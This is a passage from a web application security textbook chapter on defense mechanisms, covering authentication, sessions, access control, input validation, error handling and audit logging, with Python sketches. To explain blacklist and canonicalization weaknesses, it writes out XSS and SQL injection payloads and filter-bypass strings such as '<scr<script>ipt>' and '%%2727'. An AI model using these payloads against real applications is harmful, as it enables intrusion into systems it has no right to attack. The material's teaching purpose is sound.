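    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)


def make_record(password: str) -> tuple:
    """Return a (salt, hash) pair for storage."""
    salt = os.urandom(16)
    return salt, hash_password(password, salt)


# Hypothetical in-memory user store: username -> (salt, password hash).
USERS = {"alice": make_record("correct horse battery staple")}

# Dummy record, so that an unknown username costs the same work as a known one.
_DUMMY = make_record("placeholder")


def check_login(username: str, password: str) -> bool:
    """Return True only for a known user with the right password."""
    salt, stored = USERS.get(username, _DUMMY)
    candidate = hash_password(password, salt)
    matches = hmac.compare_digest(candidate, stored)
    # The caller should show one generic failure message in both failure cases.
    return matches and username in USERS
```

A sketch like this does nothing about weak passwords or brute-force guessing; those need separate controls such as password quality rules and limits on failed attempts.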

Session Management

The next logical task in the process of handling user access is to manage the

authenticated user’s session. After successfully logging in to the application,

the user will access various pages and functions, making a series of HTTP

requests from their browser. At the same time, the application will be receiving

countless other requests from different users, some of whom are authenticated

and some of whom are anonymous. In order to enforce effective access control,

the application needs a way of identifying and processing the series of requests

that originate from each unique user.

Virtually all web applications meet this requirement by creating a session

for each user and issuing the user a token that identifies the session. The ses-

sion itself is a set of data structures held on the server, which are used to track

the state of the user’s interaction with the application. The token is a unique

string that the application maps to the session. When a user has received a

token, the browser automatically submits this back to the server in each sub-

sequent HTTP request, enabling the application to associate the request with

that user. HTTP cookies are the standard method for transmitting session

tokens, although many applications use hidden form fields or the URL query

string for this purpose. If a user does not make a request for a given period,

then the session is ideally expired, as in Figure 2-2.
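The token-and-session arrangement described here can be sketched in a few lines. This is an illustration under stated assumptions, not a description of any particular framework: the class name SessionStore, the 15-minute idle timeout, and the in-memory dictionary are all hypothetical. The token comes from Python’s secrets module, which is designed for generating unpredictable values.

```python
import secrets
import time
from typing import Optional

IDLE_TIMEOUT_SECONDS = 15 * 60  # assumed idle timeout for this sketch


class SessionStore:
    """Server-side sessions keyed by an unpredictable token."""

    def __init__(self, clock=time.monotonic):
        self._sessions = {}
        self._clock = clock  # injectable so the timeout can be exercised in tests

    def create(self, username: str) -> str:
        """Start a session and return the token to send to the browser."""
        token = secrets.token_urlsafe(32)  # 32 random bytes, URL-safe text
        self._sessions[token] = {"user": username, "last_seen": self._clock()}
        return token

    def lookup(self, token: str) -> Optional[str]:
        """Map a submitted token back to its user, or None if invalid or expired."""
        session = self._sessions.get(token)
        if session is None:
            return None
        now = self._clock()
        if now - session["last_seen"] > IDLE_TIMEOUT_SECONDS:
            del self._sessions[token]  # expire the idle session
            return None
        session["last_seen"] = now
        return session["user"]
```

In use, the application would call create() after a successful login, send the returned token to the browser in a cookie, and call lookup() on every subsequent request.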

In terms of attack surface, the session management mechanism is highly

dependent on the security of its tokens, and the majority of attacks against it

seek to compromise the tokens issued to other users. If this is possible, an

attacker can masquerade as the victim user and use the application just as if

they had actually authenticated as that user. The principal areas of vulnerabil-

ity arise from defects in the way tokens are generated, enabling an attacker to

guess the tokens issued to other users, and defects in the way tokens are sub-

sequently handled, enabling an attacker to capture other users’ tokens.

Figure 2-2: An application enforcing session timeout

A small number of applications dispense with the need for session tokens by

using other means of re-identifying users across multiple requests. If HTTP’s

built-in authentication mechanism is used, then the browser automatically

resubmits the user’s credentials with each request, enabling the application to

identify the user directly from these. In other cases, the application stores the

state information on the client side rather than the server, usually in encrypted

form to prevent tampering.
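Where state is held on the client, the server needs some way to detect modification. The sketch below shows one way to do that, by attaching a keyed hash (an HMAC) to the state. Note the swap: this detects tampering but does not encrypt anything, so the client can still read the state, which is a weaker property than the encrypted form mentioned above. The key, the function names, and the wire format are assumptions made for the example.

```python
import base64
import hashlib
import hmac
import json

# Hypothetical server-side secret; a real deployment would load a random key
# from protected configuration.
SECRET_KEY = b"replace-with-a-random-server-side-key"


def seal(state: dict) -> str:
    """Serialize state and append an HMAC-SHA256 tag."""
    payload = base64.urlsafe_b64encode(
        json.dumps(state, sort_keys=True).encode("utf-8")
    )
    tag = hmac.new(SECRET_KEY, payload, hashlib.sha256).hexdigest()
    return payload.decode("ascii") + "." + tag


def unseal(blob: str):
    """Return the state if the tag verifies, otherwise None."""
    payload, sep, tag = blob.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(SECRET_KEY, payload.encode("utf-8"), hashlib.sha256).hexdigest()
    # Compare as bytes so that arbitrary attacker-supplied text cannot raise.
    if not hmac.compare_digest(tag.encode("utf-8"), expected.encode("utf-8")):
        return None
    return json.loads(base64.urlsafe_b64decode(payload))
```

A client that changes any part of the payload cannot produce a matching tag without the server’s key, so unseal() rejects the modified value.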

Access Control

The final logical step in the process of handling user access is to make and

enforce correct decisions regarding whether each individual request should be

permitted or denied. If the preceding mechanisms are functioning correctly,

the application knows the identity of the user from whom each request is

received. On this basis, it needs to decide whether that user is authorized to

perform the action, or access the data, that he is requesting (see Figure 2-3).

The access control mechanism usually needs to implement some fine-

grained logic, with different considerations being relevant to different areas of

the application and different types of functionality. An application might sup-

port numerous different user roles, each involving different combinations of

specific privileges. Individual users may be permitted to access a subset of the

total data held within the application. Specific functions may implement trans-

action limits and other checks, all of which need to be properly enforced based

on the user’s identity.

Figure 2-3: An application enforcing access control

Because of the complex nature of typical access control requirements, this

mechanism is a frequent source of security vulnerabilities that enable an

attacker to gain unauthorized access to data and functionality. Developers

very often make flawed assumptions about how users will interact with the

application, and frequently make oversights by omitting access control checks

from some application functions. Probing for these vulnerabilities is often

laborious because essentially the same checks need to be repeated for each

item of functionality. Because of the prevalence of access control flaws, how-

ever, this effort is always a worthwhile investment when you are attacking a

web application.
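The three kinds of check described in this section (role privileges, per-user data, and transaction limits) can be combined in a single decision function that every request handler calls. The following sketch is only an illustration: the roles, privilege names, limits, and the may_perform function are hypothetical, and a real application would load them from its own policy.

```python
from dataclasses import dataclass

# Hypothetical mapping of roles to the actions they may perform.
ROLE_PRIVILEGES = {
    "anonymous": set(),
    "user": {"read_mail", "transfer_funds"},
    "admin": {"read_mail", "transfer_funds", "manage_users"},
}

# Hypothetical per-role transaction limits.
TRANSFER_LIMIT = {"user": 1_000, "admin": 10_000}


@dataclass(frozen=True)
class User:
    name: str
    role: str


def may_perform(user: User, action: str, *, owner=None, amount=0) -> bool:
    """Decide whether one request is permitted. Denies by default."""
    # 1. Does the user's role include this action at all?
    if action not in ROLE_PRIVILEGES.get(user.role, set()):
        return False
    # 2. If the action targets a specific user's data, is it this user's own?
    if owner is not None and owner != user.name:
        return False
    # 3. Does the request stay within the role's transaction limit?
    if action == "transfer_funds" and amount > TRANSFER_LIMIT.get(user.role, 0):
        return False
    return True
```

Centralizing the decision in one function makes it harder to omit a check from an individual page or function, which is the kind of oversight described above.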

Handling User Input

Recall the fundamental security problem described in Chapter 1: all user input

is untrusted. A huge variety of different attacks against web applications

involve submitting unexpected input, crafted to cause behavior that was not

intended by the application’s designers. Correspondingly, a key requirement

for an application’s security defenses is that it must handle user input in a safe

manner.

Input-based vulnerabilities can arise anywhere within an application’s func-

tionality, and in relation to practically every type of technology in common use.

“Input validation” is often cited as the necessary defense against these attacks.

However, there is no single protective mechanism that can be employed every-

where, and defending against malicious input is often not as straightforward as

it sounds.

Varieties of Input

A typical web application processes user-supplied data in a range of different

forms. Some kinds of input validation may not be feasible or desirable for all

of these forms of input. Figure 2-4 shows the kind of input validation often

performed by a user registration function.

In many cases, an application may be able to impose very stringent valida-

tion checks on a specific item of input. For example, a username submitted to

a login function may be required to have a maximum length of eight charac-

ters and contain only alphabetical letters.

In other cases, the application must tolerate a wider range of possible input.

For example, an address field submitted to a personal details page might legit-

imately contain letters, numbers, spaces, hyphens, apostrophes, and other char-

acters. For this item, there are still restrictions that can feasibly be imposed,

however. The data should not exceed a reasonable length limit (such as 50 char-

acters), and should not contain any HTML mark-up.
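The username and address rules just described translate directly into pattern checks. This is a minimal sketch: the exact set of "other characters" allowed in an address (here a period and a comma) is an assumption, as are the function names. Leaving angle brackets out of the permitted set is what excludes HTML mark-up.

```python
import re

# Alphabetical letters only, between 1 and 8 characters.
USERNAME_RE = re.compile(r"[A-Za-z]{1,8}")

# Letters, digits, spaces, apostrophes, hyphens, periods and commas,
# up to 50 characters. No '<' or '>' is permitted, so mark-up cannot pass.
ADDRESS_RE = re.compile(r"[A-Za-z0-9 '\-.,]{1,50}")


def valid_username(value: str) -> bool:
    # fullmatch requires the whole string to match, including any trailing newline.
    return USERNAME_RE.fullmatch(value) is not None


def valid_address(value: str) -> bool:
    return ADDRESS_RE.fullmatch(value) is not None
```

Using fullmatch rather than a search avoids a common mistake in which a pattern is satisfied by one part of the input while the rest of it goes unchecked.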

In some situations, an application may need to accept completely arbitrary

input from users. For example, a user of a blogging application may create a

blog whose subject is web application hacking. Posts and comments made to

the blog may quite legitimately contain explicit attack strings that are being

discussed. The application may need to store this input within a database,

write it to disk, and display it back to users in a safe way. It cannot simply

reject the input because it looks potentially malicious without substantially

diminishing the value of the application to some of its user base.

Figure 2-4: An application performing input validation

In addition to the various kinds of input that are entered by users via the browser interface, a typical application also receives numerous items of data

that began their life on the server and that are sent to the client so that the client

can transmit them back to the server on subsequent requests. This includes

items such as cookies and hidden form fields, which are not seen by ordinary

users of the application but which an attacker can of course view and modify.

In these cases, applications can often perform very specific validation of the

data received. For example, a parameter might be required to have one of a

specific set of known values, such as a cookie indicating the user’s preferred

language, or to be in a specific format, such as a customer ID number. Further,

when an application detects that server-generated data has been modified in a

way that is not possible for an ordinary user with a standard browser, this is

often an indication that the user is attempting to probe the application for vul-

nerabilities. In these cases, the application should reject the request and log the

incident for potential investigation (see the “Handling Attackers” section later

in this chapter).
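For data that the server itself issued, validation can be exact, and a failure is worth recording. The sketch below checks a language cookie against a known set and a customer ID against a fixed format, then rejects and logs anything else. The cookie and field names, the supported languages, the eight-digit ID format, and the TamperedRequest exception are all hypothetical.

```python
import logging
import re

log = logging.getLogger("app.security")

SUPPORTED_LANGUAGES = {"en", "fr", "de"}   # assumed set of values the server issues
CUSTOMER_ID_RE = re.compile(r"[0-9]{8}")   # assumed format: exactly eight digits


class TamperedRequest(Exception):
    """Raised when server-generated data comes back modified."""


def read_server_set_fields(cookies: dict, form: dict) -> tuple:
    """Return (language, customer_id), or reject the request and log it."""
    language = cookies.get("lang", "")
    customer_id = form.get("customer_id", "")
    if language not in SUPPORTED_LANGUAGES:
        # %r escapes control characters, keeping the log entry on one line.
        log.warning("unexpected lang cookie: %r", language)
        raise TamperedRequest("lang")
    if CUSTOMER_ID_RE.fullmatch(customer_id) is None:
        log.warning("malformed customer_id field: %r", customer_id)
        raise TamperedRequest("customer_id")
    return language, customer_id
```

An ordinary browser can only send back the values the server issued, so any request that raises TamperedRequest here is a reasonable candidate for investigation.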

Approaches to Input Handling

There are various broad approaches that are commonly taken to the problem

of handling user input. Different approaches are often preferable for different

situations and different types of input, and a combination of approaches may

sometimes be desirable.

“Reject Known Bad”

This approach typically employs a blacklist containing a set of literal strings or

patterns that are known to be used in attacks. The validation mechanism

blocks any data that matches the blacklist and allows everything else.

In general, this is regarded as the least effective approach to validating user

input, for two main reasons. First, a typical vulnerability in a web application

can be exploited using a wide variety of different input, which may be

encoded or represented in various different ways. Except in the simplest of

cases, it is likely that a blacklist will omit some patterns of input that can be

used to attack the application. Second, techniques for exploitation are con-

stantly evolving. Novel methods for exploiting existing categories of vulnera-

bility are unlikely to be blocked by current blacklists.
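The first weakness is easy to demonstrate. The following sketch implements a deliberately naive blacklist and shows several inputs that pass straight through it. The two blacklist entries and the function name are illustrative assumptions, and the filter is shown as an example of what not to rely on.

```python
from urllib.parse import unquote

# A deliberately naive blacklist of literal attack strings.
BLACKLIST = ["<script>", "' or 1=1"]


def naive_filter_allows(value: str) -> bool:
    """Allow anything that does not contain a blacklisted literal."""
    return not any(bad in value for bad in BLACKLIST)


# The exact blacklisted string is blocked...
print(naive_filter_allows("<script>alert(1)</script>"))

# ...but trivial variations are allowed through.
bypasses = [
    "<ScRiPt>alert(1)</ScRiPt>",          # different letter case
    "<img src=x onerror=alert(1)>",       # different tag altogether
    "%3Cscript%3Ealert(1)%3C/script%3E",  # URL-encoded, decoded after the check
    "' or 2=2--",                         # equivalent condition, different literal
]
for candidate in bypasses:
    print(naive_filter_allows(candidate), candidate)

# If a later component URL-decodes the value, the blocked string reappears.
print(unquote("%3Cscript%3E"))
```

Each bypass could be patched by adding another entry or a normalization step, but the list of variations is open-ended, which is the underlying problem with this approach.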

“Accept Known Good”

This approach employs a white list containing a set of literal strings or pat-

terns, or a set of criteria, that is known to match only benign input. The vali-

dation mechanism allows data that matches the white list, and blocks

everything else. For example, before looking up a requested product code in

the database, an application might validate that it contains only alphanumeric

characters and is exactly six characters long. Given the subsequent processing

that will be done on the product code, the developers know that input passing

this test cannot possibly cause any problems.
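The product code check described above might be sketched as follows in Python. The function name is_valid_product_code is our own, and we assume that "alphanumeric" means ASCII letters and digits.

```python
import re

# White list: exactly six ASCII letters or digits, and nothing else.
PRODUCT_CODE = re.compile(r"[A-Za-z0-9]{6}")


def is_valid_product_code(code: str) -> bool:
    """Accept the code only if the whole string matches the white list."""
    return PRODUCT_CODE.fullmatch(code) is not None
```

Using fullmatch rather than a partial match matters here: the test must apply to the entire item of input, so that a valid-looking prefix cannot carry extra characters along with it.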

In cases where this approach is feasible, it is regarded as the most effective

way of handling potentially malicious input. Provided that due care is taken in

constructing the white list, an attacker will not be able to use crafted input to

interfere with the application’s behavior. However, there are numerous situa-

tions in which an application must accept data for processing that does not

meet any reasonable criteria for what is known to be “good.” For example,

some people’s names contain the apostrophe and hyphen characters. These

can be used in attacks against databases, but it may be a requirement that the

application should permit anyone to register under their real name. Hence,

while it is often extremely effective, the white-list-based approach does not

represent an all-purpose solution to the problem of handling user input.

Sanitization

This approach recognizes the need to sometimes accept data that cannot be

guaranteed as safe. Instead of rejecting this input, the application sanitizes it in

various ways to prevent it from having any adverse effects. Potentially mali-

cious characters may be removed from the data altogether, leaving only what

is known to be safe, or they may be suitably encoded or “escaped” before fur-

ther processing is performed.

Approaches based on data sanitization are often highly effective, and in

many situations they can be relied upon as a general solution to the problem of

malicious input. For example, the usual defense against cross-site scripting

attacks is to HTML-encode dangerous characters before these are embedded

into pages of the application (see Chapter 12). However, effective sanitization

may be difficult to achieve if several kinds of potentially malicious data need

to be accommodated within one item of input. In this situation, a boundary

validation approach is desirable, as described later.
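As a brief illustration of the encoding form of sanitization, the following Python sketch HTML-encodes a string before it is embedded into a page. It uses the standard library's html.escape; the wrapper name encode_for_html is hypothetical.

```python
import html


def encode_for_html(value: str) -> str:
    """HTML-encode characters that are significant in markup."""
    return html.escape(value, quote=True)


encoded = encode_for_html('<script>alert("x")</script>')
# encoded == '&lt;script&gt;alert(&quot;x&quot;)&lt;/script&gt;'
```

The data is preserved in full, but the browser will render it as text rather than interpret it as markup.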

Safe Data Handling

Very many web application vulnerabilities arise because user-supplied data is

processed in unsafe ways. It is often the case that vulnerabilities can be

avoided, not by validating the input itself but by ensuring that the processing

that is performed on it is inherently safe. In some situations, there are safe pro-

gramming methods available that avoid common problems. For example, SQL

injection attacks can be prevented through the correct use of parameterized

queries for database access (see Chapter 9). In other situations, application

functionality can be designed in such a way that inherently unsafe practices,

such as passing user input to an operating system command interpreter, are

avoided altogether.

This approach cannot be applied to every kind of task that web applications

need to perform, but where it is available it is an effective general approach to

handling potentially malicious input.
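A parameterized query can be sketched in Python using the standard sqlite3 module. The table, its contents, and the function name find_role are assumptions made for the example; other database drivers offer equivalent placeholder mechanisms with their own syntax.

```python
import sqlite3

# In-memory database with one illustrative record.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, role TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'admin')")


def find_role(name: str):
    """Look up a role; the driver binds `name` as data, never as SQL."""
    row = conn.execute(
        "SELECT role FROM users WHERE name = ?", (name,)
    ).fetchone()
    return row[0] if row else None
```

Because the user-supplied value is never concatenated into the query text, an input such as alice' OR '1'='1 is simply treated as an unusual name that matches no record.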

Semantic Checks

The defenses described so far all address the need to defend the application

against various kinds of malformed data whose content has been crafted to

interfere with the application’s processing. However, with some vulnerabili-

ties the input supplied by the attacker is identical to the input that an ordinary,

non-malicious user may submit. What makes it malicious is the different cir-

cumstances in which it is submitted. For example, an attacker might seek to

gain access to another user’s bank account by changing an account number

transmitted in a hidden form field. No amount of syntactic validation will dis-

tinguish between the user’s data and the attacker’s. To prevent unauthorized

access, the application needs to validate that the account number submitted

belongs to the user who has submitted it.
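A semantic check of this kind might look like the following Python sketch. The ACCOUNT_OWNERS mapping stands in for whatever server-side record the application holds, and the function name is hypothetical.

```python
# Hypothetical server-side record of which user owns each account.
ACCOUNT_OWNERS = {"10001": "alice", "10002": "bob"}


def can_access_account(session_user: str, account_number: str) -> bool:
    """Allow access only if the account belongs to the authenticated user."""
    return ACCOUNT_OWNERS.get(account_number) == session_user
```

Note that the account number 10002 is perfectly well formed; it is rejected for alice only because of who is asking.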

Boundary Validation

The idea of validating data across trust boundaries is a familiar one. The core

security problem with web applications arises because data received from

users is untrusted. While input validation checks implemented on the client

side may improve performance and the user’s experience, they do not provide

any assurance over the data that actually reaches the server. The point at

which user data is first received by the server-side application represents a

huge trust boundary, at which the application needs to take measures to

defend itself against malicious input.

Given the nature of the core problem, it is tempting to think of the input val-

idation problem in terms of a frontier between the Internet, which is “bad” and

untrusted, and the server-side application, which is “good” and trusted. In

this picture, the role of input validation is to clean potentially malicious data

on arrival and then pass the clean data to the trusted application. From this

point onwards, the data may be trusted and processed without any further

checks or concern about possible attacks.

As will become evident when we begin to examine some actual vulnerabil-

ities, this simple picture of input validation is inadequate, for several reasons:

■■

Given the wide range of functionality that applications implement, and

the different technologies in use, a typical application needs to defend

itself against a huge variety of input-based attacks, each of which may

employ a diverse set of crafted data. It would be very difficult to devise

a single mechanism at the external boundary to defend against all of

these attacks.

■■

Many application functions involve chaining together a series of

different types of processing. A single piece of user-supplied input

might result in a number of operations in different components, with

the output of each being used as the input for the next. As the data is

transformed, it might come to bear no resemblance to the original

input, and a skilled attacker may be able to manipulate the application

to cause malicious input to be generated at a key stage of the process-

ing, attacking the component which receives this data. It would be

extremely difficult to implement a validation mechanism at the external

boundary to foresee all of the possible results of processing each piece

of user input.

■■

Defending against different categories of input-based attack may entail

performing different validation checks on user input that are incompat-

ible with one another. For example, preventing cross-site scripting

attacks may require HTML-encoding the > character as &gt;, while preventing

command injection attacks may require blocking input containing the & and ;

characters. Attempting to prevent all categories of attack

simultaneously at the application’s external boundary may sometimes

be impossible.

A more effective model uses the concept of boundary validation. Here, each

individual component or functional unit of the server-side application treats

its inputs as coming from a potentially malicious source. Data validation is

performed at each of these trust boundaries, in addition to the external frontier

between the client and server. This model provides a solution to the problems

described in the previous list. Each component can defend itself against the

specific types of crafted input to which it may be vulnerable. As data passes

through different components, validation checks can be performed against

whatever value the data has as a result of previous transformations. And

because the various validation checks are implemented at different stages of

processing, they are unlikely to come into conflict with one another.

Figure 2-5 illustrates a typical situation where boundary validation is the

most effective approach to defending against malicious input. The user login

results in several steps of processing being performed on user-supplied input,

and suitable validation is performed at each step:

1. The application receives the user’s login details. The form handler vali-

dates that each item of input contains only permitted characters, is

within a specific length limit, and does not contain any known attack

signatures.

2. The application performs an SQL query to verify the user’s credentials.

To prevent SQL injection attacks, any characters within the user input

that may be used to attack the database are escaped before the query is

constructed.

3. If the login succeeds, the application passes certain data from the user’s

profile to a SOAP service to retrieve further information about her

account. To prevent SOAP injection attacks, any XML metacharacters

within the user’s profile data are suitably encoded.

4. The application displays the user’s account information back to the

user’s browser. To prevent cross-site scripting attacks, the application

HTML-encodes any user-supplied data that is embedded into the

returned page.

Figure 2-5: An application function using boundary validation at multiple stages of

processing

The specific vulnerabilities and defenses involved in the described scenario

will be examined in detail in later chapters. If variations on this functionality

involved passing data to further application components, then similar

defenses would need to be implemented at the relevant trust boundaries. For

example, if a failed login caused the application to send a warning email to the

user, then any user data incorporated into the email may need to be checked

for SMTP injection attacks.
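Steps 1, 3, and 4 of the login example can be sketched in Python as separate checks, each applied at the boundary where the data is about to be used. The username policy and all function names are assumptions made for illustration, and the SQL step is omitted here.

```python
import html
import re
from xml.sax.saxutils import escape as xml_escape

# Assumed policy for step 1: permitted characters and a length limit.
USERNAME = re.compile(r"[A-Za-z0-9_.-]{1,32}")


def check_at_form_handler(username: str) -> bool:
    """Step 1: general checks when the input first arrives."""
    return USERNAME.fullmatch(username) is not None


def encode_for_soap(value: str) -> str:
    """Step 3: encode XML metacharacters before building the SOAP message."""
    return xml_escape(value)


def encode_for_page(value: str) -> str:
    """Step 4: HTML-encode data before embedding it in the response."""
    return html.escape(value)


profile_name = "O'Neil <&Co>"
soap_fragment = f"<name>{encode_for_soap(profile_name)}</name>"
page_fragment = f"<td>{encode_for_page(profile_name)}</td>"
```

Each encoding is applied to the value as it stands at that stage, so the two defenses do not interfere with each other in the way they might if both were attempted at the external boundary.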

[Figure 2-5 diagram labels: User; Application server (1. General checks, 4. Sanitize output, Display account details); Database (2. Clean SQL, SQL query); SOAP service (3. Encode XML metacharacters, SOAP message)]

Multistep Validation and Canonicalization

A common problem encountered by input-handling mechanisms arises when

user-supplied input is manipulated across several steps as part of the valida-

tion logic. If this process is not handled carefully, then an attacker may be able

to construct crafted input that succeeds in smuggling malicious data through

the validation mechanism. One version of this problem occurs when an appli-

cation attempts to sanitize user input by removing or encoding certain charac-

ters or expressions. For example, an application may attempt to defend against

some cross-site scripting attacks by stripping the expression <script>

from any user-supplied data. However, an attacker may be able to bypass the

filter by supplying the following input:

<scr<script>ipt>

When the blocked expression is removed, the surrounding data contracts to

restore the malicious payload, because the filter is not being applied recursively.
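The effect is easy to reproduce. In this Python sketch, strip_once is a hypothetical filter that removes the blocked expression in a single pass.

```python
def strip_once(value: str) -> str:
    """Remove every occurrence of <script> in a single, non-recursive pass."""
    return value.replace("<script>", "")


result = strip_once("<scr<script>ipt>")
# result == "<script>"
```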

Similarly, if more than one validation step is performed on user input, an

attacker may be able to exploit the ordering of these steps to bypass the filter.

For example, if the application first removes script tags recursively and then

strips any quotation marks, the following input can be used to defeat the vali-

dation:

<scr"ipt>
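The ordering problem can be sketched in Python as follows. The function names are hypothetical; the point is only that the second step undoes the guarantee established by the first.

```python
def strip_script_recursively(value: str) -> str:
    """Remove <script> repeatedly until none remains."""
    while "<script>" in value:
        value = value.replace("<script>", "")
    return value


def strip_quotes(value: str) -> str:
    """Remove any double quotation marks."""
    return value.replace('"', "")


def validate(value: str) -> str:
    """Apply the two steps in the order described above."""
    return strip_quotes(strip_script_recursively(value))


result = validate('<scr"ipt>')
# result == "<script>"
```

The first step finds nothing to remove, and the second step then assembles the blocked expression out of the pieces.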

A different problem arises in relation to data canonicalization. When input

is sent from the user’s browser, it may be encoded in various ways. These

encoding schemes exist in order that unusual characters and binary data may

be transmitted safely over HTTP (see Chapter 3 for more details). Canonical-

ization is the process of converting or decoding data into a common character

set. If any canonicalization is carried out after input filters have been applied,

then an attacker may be able to use encoding to bypass the validation mecha-

nism. For example, an application may attempt to defend against some SQL

injection attacks by removing the apostrophe character from user input. How-

ever, if the sanitized data is subsequently canonicalized, then an attacker may

be able to use the URL-encoded form

%27

to defeat the validation. If the application strips this URL-encoded form, but also

performs further canonicalization, then the following bypass may be effective:

%%2727

Throughout this book, we will describe numerous attacks of this kind which

are effective in defeating many applications’ defenses against common input-

based vulnerabilities.
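Both canonicalization bypasses described above can be reproduced with a short Python sketch. The two filter functions are hypothetical; urllib.parse.unquote stands in for whatever URL-decoding the application performs after filtering.

```python
from urllib.parse import unquote


def strip_apostrophes_then_decode(value: str) -> str:
    """Filter first and canonicalize afterwards: the flawed ordering."""
    return unquote(value.replace("'", ""))


def strip_both_forms_then_decode(value: str) -> str:
    """Also strip the URL-encoded form, in a single pass, then decode."""
    return unquote(value.replace("'", "").replace("%27", ""))


first = strip_apostrophes_then_decode("%27")
second = strip_both_forms_then_decode("%%2727")
# In both cases the result is a single apostrophe.
```

In the second case, removing the inner %27 causes the surrounding characters to contract into a new %27, which the later decoding step converts into the apostrophe that the filter was meant to block.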

Avoiding problems with multistep validation and canonicalization can

sometimes be difficult, and there is no single solution to the problem. One

approach is to perform sanitization steps recursively, continuing until no fur-

ther modifications have been made on an item of input. However, where the

desired sanitization involves escaping a problematic character, this may result

in an infinite loop. Often, the problem can only be addressed on a case-by-case

basis, based upon the types of validation being performed. Where feasible, it

may be preferable to avoid attempting to clean some kinds of bad input, and

simply reject it altogether.
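The following Python sketch illustrates both points, under the assumption that a sanitization step can be modeled as a function from string to string. The helper sanitize_until_stable and its max_passes guard are our own invention; the guard exists precisely because an escaping step never stops changing its input.

```python
def sanitize_until_stable(value, step, max_passes=10):
    """Apply `step` repeatedly until the value stops changing.

    Raises ValueError if the value is still changing after max_passes,
    which is what happens when `step` escapes rather than removes.
    """
    for _ in range(max_passes):
        cleaned = step(value)
        if cleaned == value:
            return cleaned
        value = cleaned
    raise ValueError("sanitization did not converge")


def remove_script(value):
    return value.replace("<script>", "")


def escape_quote(value):
    # Each pass escapes the apostrophe again, so the value keeps growing.
    return value.replace("'", "\\'")


stable = sanitize_until_stable("<scr<script>ipt>", remove_script)

try:
    sanitize_until_stable("O'Neil", escape_quote)
    escaping_converged = True
except ValueError:
    escaping_converged = False
```

Removal converges on an empty string here, while the escaping step would loop forever without the guard. Where input of this kind is never legitimate, rejecting it outright avoids the question altogether.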

Handling Attackers

Anyone designing an application for which security is remotely important

must work on the assumption that it will be directly targeted by dedicated and

skilled attackers. A key function of the application’s security mechanisms is to

be able to handle and react to these attacks in a controlled way. These mecha-

nisms often incorporate a mix of defensive and offensive measures designed to

frustrate an attacker as much as possible, and provide appropriate notification

and evidence to the application’s owners of what has taken place. Measures

implemented to handle attackers typically include the following tasks:

■■

Handling errors

■■

Maintaining audit logs

■■

Alerting administrators

■■

Reacting to attacks

Handling Errors

However careful an application’s developers are in validating user input, it is

virtually inevitable that some unanticipated errors will occur. Errors resulting

from the actions of ordinary users are likely to be identified during functionality

and user acceptance testing, and so will be addressed before the

application is deployed in a production context. However, it is very difficult to

anticipate every possible way in which a malicious user may interact with the

application, and so further errors should be expected when the application

comes under attack.

A key defense mechanism is for the application to handle unexpected

errors in a graceful manner, and either recover from them or present a suit-

able error message to the user. In a production context, the application

should never return any system-generated messages or other debug infor-

mation in its responses. As you will see throughout this book, overly verbose

error messages can greatly assist malicious users in furthering their attacks

against the application. In some situations, an attacker can leverage defective

error handling to retrieve sensitive information within the error messages

themselves, providing a valuable channel for stealing data from the applica-

tion. Figure 2-6 shows an example of an unhandled error resulting in a ver-

bose error message.

Figure 2-6: An unhandled error

Most web development languages provide good error-handling support

through try-catch blocks and checked exceptions. Application code should

make extensive use of these constructs to catch specific and general errors and

handle them appropriately. Further, most application servers can be configured

to deal with unhandled application errors in customized ways, for example by

presenting an uninformative error message. See Chapter 14 for more details of

these measures.

Effective error handling is often integrated with the application’s logging

mechanisms, which record as much debug information as possible about

unanticipated errors. Very often, unexpected errors point to defects within the

application’s defenses that can be addressed at the source if the application’s

owner has the required information.
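One way of combining these ideas is sketched below in Python. The handle_request wrapper, the logger name, and the use of a random incident reference are all assumptions made for the example, not features of any particular framework.

```python
import logging
import uuid

logger = logging.getLogger("app.errors")


def handle_request(handler, request):
    """Run a handler; on any unexpected error, log the details
    server-side and return only a generic message to the user."""
    try:
        return 200, handler(request)
    except Exception:
        incident_id = uuid.uuid4().hex
        # The full stack trace goes to the application's log only.
        logger.exception("Unhandled error, incident %s", incident_id)
        return 500, f"An error occurred. Reference: {incident_id}"
```

The reference returned to the user discloses nothing about the failure, but it allows the application's owners to find the corresponding debug information in the log.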

Maintaining Audit Logs

Audit logs are primarily of value when investigating intrusion attempts against

an application. Following such an incident, effective audit logs should enable

the application’s owners to understand exactly what has taken place, which

vulnerabilities (if any) were exploited, whether the attacker gained unautho-

rized access to data or performed any unauthorized actions, and as far as pos-

sible, provide evidence as to the intruder’s identity.

In any application for which security is important, key events should be

logged as a matter of course. At a minimum, these typically include:

■■

All events relating to the authentication functionality, such as successful

and failed login, and change of password.

■■

Key transactions, such as credit card payments and funds transfers.

■■

Access attempts that are blocked by the access control mechanisms.

■■

Any requests containing known attack strings that indicate overtly

malicious intentions.

In many security-critical applications, such as those used by online banks,

every single client request is logged in full, providing a complete forensic

record that can be used to investigate any incidents.

Effective audit logs typically record the time of each event, the IP address

from which the request was received, the session token, and the user’s account

(if authenticated). Such logs need to be strongly protected against unautho-

rized read or write access. An effective approach is to store audit logs on an

autonomous system that accepts only update messages from the main appli-

cation. In some situations, logs may be flushed to write-once media to ensure

their integrity in the event of a successful attack.
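A single audit log entry containing the fields listed above might be built as in the following Python sketch. The JSON format, the field names, and the function name audit_record are assumptions; how the entry is then shipped to a separate logging system is outside the scope of the example.

```python
import json
from datetime import datetime, timezone


def audit_record(event, ip_address, session_token, user=None):
    """Build one audit log entry as a line of JSON."""
    return json.dumps({
        "time": datetime.now(timezone.utc).isoformat(),
        "event": event,
        "ip": ip_address,
        "session": session_token,
        "user": user,  # None when the request is unauthenticated
    })
```

Because each entry contains a session token, a log built in this way is itself highly sensitive and needs the protection described above.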

In terms of attack surface, poorly protected audit logs can provide a gold

mine of information to an attacker, disclosing a host of sensitive information

such as session tokens and request parameters that may enable them to imme-

diately compromise the entire application (see Figure 2-7).

Figure 2-7: Poorly protected application logs containing sensitive

information submitted by other users

Alerting Administrators

Audit logs enable an application’s owners to retrospectively investigate intru-

sion attempts, and if possible, take legal action against the perpetrator. How-

ever, in many situations it is desirable to take much more immediate action, in

real time, in response to attempted attacks. For example, administrators may

block the IP address or user account being used by an attacker. In extreme

cases, they may even take the application offline while the attack is investi-

gated and remedial action taken. Even if a successful intrusion has already

occurred, its practical effects may be mitigated if defensive action is taken at an

early stage.

